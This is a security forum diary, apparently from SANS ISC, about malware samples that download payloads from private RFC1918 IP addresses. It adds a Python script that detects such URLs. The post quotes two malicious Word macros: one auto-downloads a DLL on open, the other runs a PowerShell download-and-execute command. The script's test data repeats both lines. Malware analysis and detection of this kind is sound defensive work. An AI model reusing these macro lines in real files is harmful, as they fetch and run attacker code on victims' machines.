SANS ISC InfoSec Forums
Private IP Addresses in Malware Samples?

I'm looking for some samples on VT that contain URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious: why would malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]: 

Sub AutoOpen()
'
' test Macro
'
'
x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "\loader.dll", 0, 0)

End Sub

This one seems to be under ongoing development and does not look too dangerous. But wait: the use of VirusTotal can be very sensitive depending on your context, and submitting files to VirusTotal must be done carefully. If you are a blue-teamer, uploading a sample might alert the attacker and let him know that you're looking at him. If you're a red-teamer, uploading your self-made sample might help AV vendors improve their detection mechanisms.

Here is another one, found in another document with a higher VT score (22/57)[3]:

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    MsgBox strOutput
End Sub

Besides classic macros, I also found a lot of DLLs and DEX files (Dalvik Executables from Android applications) that contain URLs with RFC1918 IP addresses. I think that most of them are samples still being tested or developed.
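To hunt for this kind of sample locally, the following added example (not code from the diary or from SANS ISC) extracts http(s) URLs from the raw bytes of a file (macro text, strings dumped from a DLL or DEX) and flags the ones whose host is an RFC1918 address or is otherwise non-routable. The SAMPLE blob is constructed for the demo and reuses the two URLs quoted above; the empty-port form "10.200.235.200:/" from the first macro is accepted on purpose, since a naive URL regex would drop it.

```python
import ipaddress
import re

# RFC 1918 private address blocks, the ranges the diary refers to.
RFC1918_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Loose URL matcher: scheme, host, optional (possibly empty) port, optional path.
# Host is limited to DNS/IPv4 characters; the path stops at whitespace or quotes,
# so URLs embedded in VBA/PowerShell string literals are cut at the right place.
URL_RE = re.compile(rb"https?://([A-Za-z0-9.\-]+)(?::(\d*))?(/[^\s'\"<>)]*)?")


def extract_urls(data: bytes):
    """Yield (url, host) pairs for every http(s) URL found in a blob of bytes."""
    for m in URL_RE.finditer(data):
        url = m.group(0).decode("ascii", "replace")
        host = m.group(1).decode("ascii", "replace")
        yield url, host


def classify_host(host: str) -> str:
    """Return 'rfc1918', 'non-routable', 'public' or 'hostname' for a URL host."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # not an IP literal; would need DNS to say more
    if any(addr in net for net in RFC1918_NETS):
        return "rfc1918"
    if not addr.is_global:
        return "non-routable"  # loopback, link-local, CGNAT, documentation ranges
    return "public"


def find_private_ip_urls(data: bytes):
    """Return [(url, category)] for URLs whose host is not a routable public IP."""
    hits = []
    for url, host in extract_urls(data):
        category = classify_host(host)
        if category in ("rfc1918", "non-routable"):
            hits.append((url, category))
    return hits


# Constructed test blob: the two URLs from the diary plus a loopback, a public
# IP and a hostname so every branch of classify_host() is exercised.
SAMPLE = b"""
x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "\\loader.dll", 0, 0)
strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')"
dbg = "http://127.0.0.1:8080/debug"
cdn = "http://8.8.8.8/update.bin"
site = "https://example.com/page"
"""

if __name__ == "__main__":
    for url, category in find_private_ip_urls(SAMPLE):
        print(f"{category:13s} {url}")
```

Run it against `strings` output or the extracted macro text of a suspicious file; anything reported as rfc1918 is a candidate for the "still under development" pattern the diary describes, while non-routable hits (loopback, link-local) usually point at test harness leftovers rather than live infrastructure.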

[1] https://tools.ietf.org/html/rfc1918
[2] https://www.virustotal.com/gui/file/c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a/detection
[3] https://www.virustotal.com/gui/file/cdd3bdced038414f84c318fdc4b2e6573e99900fb792dd417869721cc7975b84/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant

Well. Never underestimate silly mistakes. If the good guys make them, the bad guys will make them too.
If an IP address starts with 192 there is a semi-automatic response to type 192.168 even when I need an actual public IP address starting with 192.
So I understand some of them.

Also some ISPs use private addresses on the network that can be reached from your mobile device.
So this can be an attempt to hack into them.

And I am sure there are other use cases.
Anonymous
